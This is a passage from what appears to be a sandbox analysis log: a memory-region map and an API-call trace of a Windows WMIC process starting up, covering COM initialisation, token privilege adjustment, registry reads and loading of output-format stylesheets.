= 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4731 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4732 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4733 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 4734 start_va = 0xb20000 end_va = 0xb49fff entry_point = 0xb20000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4735 start_va = 0xbb0000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 4736 start_va = 0x5370000 end_va = 0x54f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005370000" filename = "" Region: id = 4737 start_va = 0x5540000 end_va = 0x554ffff entry_point = 0x0 region_type = private name = "private_0x0000000005540000" filename = "" Region: id = 4738 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4739 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4740 start_va = 0xaf0000 end_va = 0xafffff entry_point = 0xaf0000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 4741 start_va = 0x5950000 end_va = 0x5ad0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005950000" filename = "" Region: id = 4742 start_va = 0x5ae0000 end_va = 0x6edffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005ae0000" filename = "" Region: id = 4743 start_va = 0xb20000 end_va = 0xb20fff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 4744 start_va = 0xb30000 end_va = 0xb30fff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 4745 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 4746 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4747 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4748 start_va = 0xb40000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 4749 start_va = 0xb50000 end_va = 0xb50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 4750 start_va = 0x1230000 end_va = 0x12e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Region: id = 4751 start_va = 0xb50000 end_va = 0xb53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 4752 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4753 start_va = 0x6ee0000 end_va = 0x6fdffff entry_point = 0x0 region_type = private name = "private_0x0000000006ee0000" filename = "" Region: id = 4754 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 4755 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4756 start_va = 0xb60000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 4757 start_va = 0xbc0000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 4758 start_va = 0xc00000 end_va = 0xc3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 4759 start_va = 0xc60000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 4760 start_va = 0x5500000 end_va = 0x553ffff entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 4761 start_va = 0x6fe0000 end_va = 0x701ffff entry_point = 0x0 region_type = private name = "private_0x0000000006fe0000" filename = "" Region: id = 4762 start_va = 0x7f907000 end_va = 0x7f909fff entry_point = 0x0 region_type = private name = "private_0x000000007f907000" filename = "" Region: id = 4763 start_va = 0x7f90a000 end_va = 0x7f90cfff entry_point = 0x0 region_type = private name = "private_0x000000007f90a000" filename = "" Region: id = 4764 start_va = 0x7f90d000 end_va = 0x7f90ffff entry_point = 0x0 region_type = private name = "private_0x000000007f90d000" filename = "" Region: id = 4765 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 4766 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 4767 start_va = 0xca0000 end_va = 0xcb4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Region: id = 4768 start_va = 0xca0000 end_va = 0xcc8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Thread: id = 312 os_tid = 0xc4c [0120.486] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0120.486] __set_app_type (_Type=0x1) [0120.486] __p__fmode () returned 0x77ac4d6c [0120.486] __p__commode () returned 0x77ac5b1c [0120.486] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0120.487] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0120.487] ??0CHString@@QAE@XZ () returned 0x13495ec [0120.487] ??0CHString@@QAE@XZ () returned 0x13498fc [0120.487] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0120.487] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0120.487] _onexit (_Func=0x1340a20) returned 0x1340a20 [0120.487] _onexit (_Func=0x1340a30) returned 0x1340a30 [0120.487] _onexit (_Func=0x1340a50) returned 0x1340a50 [0120.487] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.487] ResolveDelayLoadedAPI () returned 0x770fcd50 [0120.488] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0120.490] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0120.495] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0xd174f8) returned 0x0 [0120.504] GetCurrentProcess () returned 0xffffffff [0120.504] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x91f8a8 | out: TokenHandle=0x91f8a8*=0x158) returned 1 [0120.504] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x91f8a4 | out: TokenInformation=0x0, ReturnLength=0x91f8a4) returned 0 [0120.504] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0xcd3a38, TokenInformationLength=0x118, ReturnLength=0x91f8a4 | out: TokenInformation=0xcd3a38, ReturnLength=0x91f8a4) returned 1 [0120.504] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0xcd3a38*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.504] CloseHandle (hObject=0x158) returned 1 [0120.505] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.506] _vsnwprintf (in: _Buffer=0xcd3ac8, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x91f830 | out: _Buffer="ms_409") returned 6 [0120.507] GetComputerNameW (in: lpBuffer=0xcd3b10, nSize=0x91f894 | out: lpBuffer="LHNIWSJ", nSize=0x91f894) returned 1 [0120.507] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.507] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.507] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0120.507] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x91f8a8 | out: lpNameBuffer=0x0, nSize=0x91f8a8) returned 0x0 [0120.508] GetLastError () returned 0xea [0120.508] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xcd3b50, nSize=0x91f8a8 | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0x91f8a8) returned 0x1 [0120.508] lstrlenW (lpString="") returned 0 [0120.508] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.508] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0120.509] lstrlenW (lpString=".") returned 1 [0120.509] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.509] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0120.509] lstrlenW (lpString="LOCALHOST") returned 9 [0120.509] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.509] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0120.509] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.509] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.509] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0120.509] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.509] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.509] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.509] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.509] ResolveDelayLoadedAPI () returned 0x77bb9840 [0120.511] SysStringLen (param_1="IDENTIFY") returned 0x8 [0120.511] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0120.511] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0120.511] SysStringLen (param_1="IDENTIFY") returned 0x8 [0120.511] SysStringLen (param_1="IMPERSONATE") returned 0xb [0120.511] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0120.511] SysStringLen (param_1="IMPERSONATE") returned 0xb [0120.511] SysStringLen (param_1="IDENTIFY") returned 0x8 [0120.511] SysStringLen (param_1="IDENTIFY") returned 0x8 [0120.511] SysStringLen (param_1="IMPERSONATE") returned 0xb [0120.511] SysStringLen (param_1="DELEGATE") returned 0x8 [0120.511] SysStringLen (param_1="IDENTIFY") returned 0x8 [0120.511] SysStringLen (param_1="DELEGATE") returned 0x8 [0120.511] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0120.511] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0120.511] SysStringLen (param_1="DELEGATE") returned 0x8 [0120.511] SysStringLen (param_1="NONE") returned 0x4 [0120.511] SysStringLen (param_1="DEFAULT") returned 0x7 [0120.511] SysStringLen (param_1="DEFAULT") returned 0x7 [0120.511] SysStringLen (param_1="NONE") returned 0x4 [0120.511] SysStringLen (param_1="CONNECT") returned 0x7 [0120.511] SysStringLen (param_1="DEFAULT") returned 0x7 [0120.512] SysStringLen (param_1="CALL") returned 0x4 [0120.512] SysStringLen (param_1="DEFAULT") returned 0x7 [0120.512] SysStringLen (param_1="CALL") returned 0x4 [0120.512] SysStringLen (param_1="CONNECT") returned 0x7 [0120.512] SysStringLen (param_1="PKT") returned 0x3 [0120.512] SysStringLen (param_1="DEFAULT") returned 0x7 [0120.512] SysStringLen (param_1="PKT") returned 0x3 [0120.512] SysStringLen (param_1="NONE") returned 0x4 [0120.512] SysStringLen (param_1="NONE") returned 0x4 [0120.512] SysStringLen (param_1="PKT") returned 0x3 [0120.512] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0120.512] SysStringLen (param_1="DEFAULT") returned 0x7 [0120.512] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0120.512] SysStringLen (param_1="NONE") returned 0x4 [0120.512] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0120.512] SysStringLen (param_1="PKT") returned 0x3 [0120.512] SysStringLen (param_1="PKT") returned 0x3 [0120.512] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0120.512] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0120.512] SysStringLen (param_1="DEFAULT") returned 0x7 [0120.512] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0120.512] SysStringLen (param_1="PKT") returned 0x3 [0120.512] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0120.512] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0120.512] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0120.513] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0120.513] GetSystemDirectoryW (in: lpBuffer=0xcd29d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0120.513] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0120.513] SysStringLen (param_1="\\wbem\\") returned 0x6 [0120.513] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0120.513] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0120.513] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0120.513] GetCurrentThreadId () returned 0xc4c [0120.513] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x91f3b8 | out: phkResult=0x91f3b8*=0x164) returned 0x0 [0120.513] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x91f3c4, lpcbData=0x91f3c0*=0x400 | out: lpType=0x0, lpData=0x91f3c4*=0x30, lpcbData=0x91f3c0*=0x4) returned 0x0 [0120.513] _wcsicmp (_String1="0", _String2="1") returned -1 [0120.513] _wcsicmp (_String1="0", _String2="2") returned -2 [0120.513] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x91f3c0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x91f3c0*=0x42) returned 0x0 [0120.513] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0xcd2be0, lpcbData=0x91f3c0*=0x42 | out: lpType=0x0, lpData=0xcd2be0*=0x25, lpcbData=0x91f3c0*=0x42) returned 0x0 [0120.513] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0120.513] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0120.513] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x91f3c4, lpcbData=0x91f3c0*=0x400 | out: lpType=0x0, lpData=0x91f3c4*=0x36, lpcbData=0x91f3c0*=0xc) returned 0x0 [0120.513] _wtol (_String="65536") returned 65536 [0120.513] RegCloseKey (hKey=0x0) returned 0x6 [0120.514] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x91f858 | out: ppv=0x91f858*=0xac45a8) returned 0x0 [0120.522] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0xac45a8, xmlSource=0x91f7d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x91f83c | out: isSuccessful=0x91f83c*=0xffff) returned 0x0 [0120.564] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0xac45a8, DOMElement=0x91f850 | out: DOMElement=0x91f850) returned 0x0 [0120.565] SysStringLen (param_1="VALUE") returned 0x5 [0120.565] SysStringLen (param_1="TABLE") returned 0x5 [0120.565] SysStringLen (param_1="TABLE") returned 0x5 [0120.565] SysStringLen (param_1="VALUE") returned 0x5 [0120.565] SysStringLen (param_1="LIST") returned 0x4 [0120.565] SysStringLen (param_1="TABLE") returned 0x5 [0120.565] SysStringLen (param_1="RAWXML") returned 0x6 [0120.565] SysStringLen (param_1="TABLE") returned 0x5 [0120.565] SysStringLen (param_1="RAWXML") returned 0x6 [0120.565] SysStringLen (param_1="LIST") returned 0x4 [0120.566] SysStringLen (param_1="LIST") returned 0x4 [0120.566] SysStringLen (param_1="RAWXML") returned 0x6 [0120.566] SysStringLen (param_1="HTABLE") returned 0x6 [0120.566] SysStringLen (param_1="TABLE") returned 0x5 [0120.566] SysStringLen (param_1="HTABLE") returned 0x6 [0120.566] SysStringLen (param_1="LIST") returned 0x4 [0120.566] SysStringLen (param_1="HFORM") returned 0x5 [0120.566] SysStringLen (param_1="TABLE") returned 0x5 [0120.566] SysStringLen (param_1="HFORM") returned 0x5 [0120.566] SysStringLen (param_1="LIST") returned 0x4 [0120.566] SysStringLen (param_1="HFORM") returned 0x5 [0120.566] SysStringLen (param_1="HTABLE") returned 0x6 [0120.567] SysStringLen (param_1="XML") returned 0x3 [0120.567] SysStringLen (param_1="TABLE") returned 0x5 [0120.567] SysStringLen (param_1="XML") returned 0x3 [0120.567] SysStringLen (param_1="VALUE") returned 0x5 [0120.567] SysStringLen (param_1="VALUE") returned 0x5 [0120.567] SysStringLen (param_1="XML") returned 0x3 [0120.567] SysStringLen (param_1="MOF") returned 0x3 [0120.567] SysStringLen (param_1="TABLE") returned 0x5 [0120.567] SysStringLen (param_1="MOF") returned 0x3 [0120.567] SysStringLen (param_1="LIST") returned 0x4 [0120.567] SysStringLen (param_1="MOF") returned 0x3 [0120.567] SysStringLen (param_1="RAWXML") returned 0x6 [0120.567] SysStringLen (param_1="LIST") returned 0x4 [0120.567] SysStringLen (param_1="MOF") returned 0x3 [0120.568] SysStringLen (param_1="CSV") returned 0x3 [0120.568] SysStringLen (param_1="TABLE") returned 0x5 [0120.568] SysStringLen (param_1="CSV") returned 0x3 [0120.568] SysStringLen (param_1="LIST") returned 0x4 [0120.568] SysStringLen (param_1="CSV") returned 0x3 [0120.568] SysStringLen (param_1="HTABLE") returned 0x6 [0120.568] SysStringLen (param_1="CSV") returned 0x3 [0120.568] SysStringLen (param_1="HFORM") returned 0x5 [0120.568] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.568] SysStringLen (param_1="TABLE") returned 0x5 [0120.568] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.568] SysStringLen (param_1="VALUE") returned 0x5 [0120.568] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.568] SysStringLen (param_1="XML") returned 0x3 [0120.568] SysStringLen (param_1="XML") returned 0x3 [0120.568] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.569] SysStringLen (param_1="texttablewsys") returned 0xd [0120.569] SysStringLen (param_1="TABLE") returned 0x5 [0120.569] SysStringLen (param_1="texttablewsys") returned 0xd [0120.569] SysStringLen (param_1="XML") returned 0x3 [0120.569] SysStringLen (param_1="texttablewsys") returned 0xd [0120.569] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.569] SysStringLen (param_1="XML") returned 0x3 [0120.569] SysStringLen (param_1="texttablewsys") returned 0xd [0120.569] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.569] SysStringLen (param_1="TABLE") returned 0x5 [0120.569] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.569] SysStringLen (param_1="XML") returned 0x3 [0120.569] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.569] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.569] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.569] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.570] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0120.570] SysStringLen (param_1="TABLE") returned 0x5 [0120.570] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0120.570] SysStringLen (param_1="XML") returned 0x3 [0120.570] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0120.570] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.570] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0120.570] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.570] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.570] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0120.570] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.570] SysStringLen (param_1="TABLE") returned 0x5 [0120.570] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.570] SysStringLen (param_1="XML") returned 0x3 [0120.570] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.570] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.570] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.570] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.570] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.570] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.571] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0120.571] SysStringLen (param_1="TABLE") returned 0x5 [0120.571] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0120.571] SysStringLen (param_1="XML") returned 0x3 [0120.571] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0120.571] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.571] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0120.571] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.571] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0120.571] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0120.571] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.571] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0120.571] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0120.571] SysStringLen (param_1="TABLE") returned 0x5 [0120.571] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0120.571] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.571] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0120.571] SysStringLen (param_1="XML") returned 0x3 [0120.572] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0120.572] SysStringLen (param_1="texttablewsys") returned 0xd [0120.572] SysStringLen (param_1="XML") returned 0x3 [0120.572] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0120.572] SysStringLen (param_1="htable-sortby") returned 0xd [0120.572] SysStringLen (param_1="TABLE") returned 0x5 [0120.572] SysStringLen (param_1="htable-sortby") returned 0xd [0120.572] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.572] SysStringLen (param_1="htable-sortby") returned 0xd [0120.572] SysStringLen (param_1="XML") returned 0x3 [0120.572] SysStringLen (param_1="htable-sortby") returned 0xd [0120.572] SysStringLen (param_1="texttablewsys") returned 0xd [0120.572] SysStringLen (param_1="htable-sortby") returned 0xd [0120.572] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0120.572] SysStringLen (param_1="XML") returned 0x3 [0120.572] SysStringLen (param_1="htable-sortby") returned 0xd [0120.572] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0120.572] SysStringLen (param_1="TABLE") returned 0x5 [0120.573] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0120.573] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.573] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0120.573] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.573] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0120.573] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0120.573] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.573] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0120.573] SysStringLen (param_1="wmiclimofformat") returned 0xf [0120.573] SysStringLen (param_1="TABLE") returned 0x5 [0120.573] SysStringLen (param_1="wmiclimofformat") returned 0xf [0120.573] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.573] SysStringLen (param_1="wmiclimofformat") returned 0xf [0120.573] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0120.573] SysStringLen (param_1="wmiclimofformat") returned 0xf [0120.573] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0120.573] SysStringLen (param_1="wmiclimofformat") returned 0xf [0120.573] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0120.573] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0120.573] 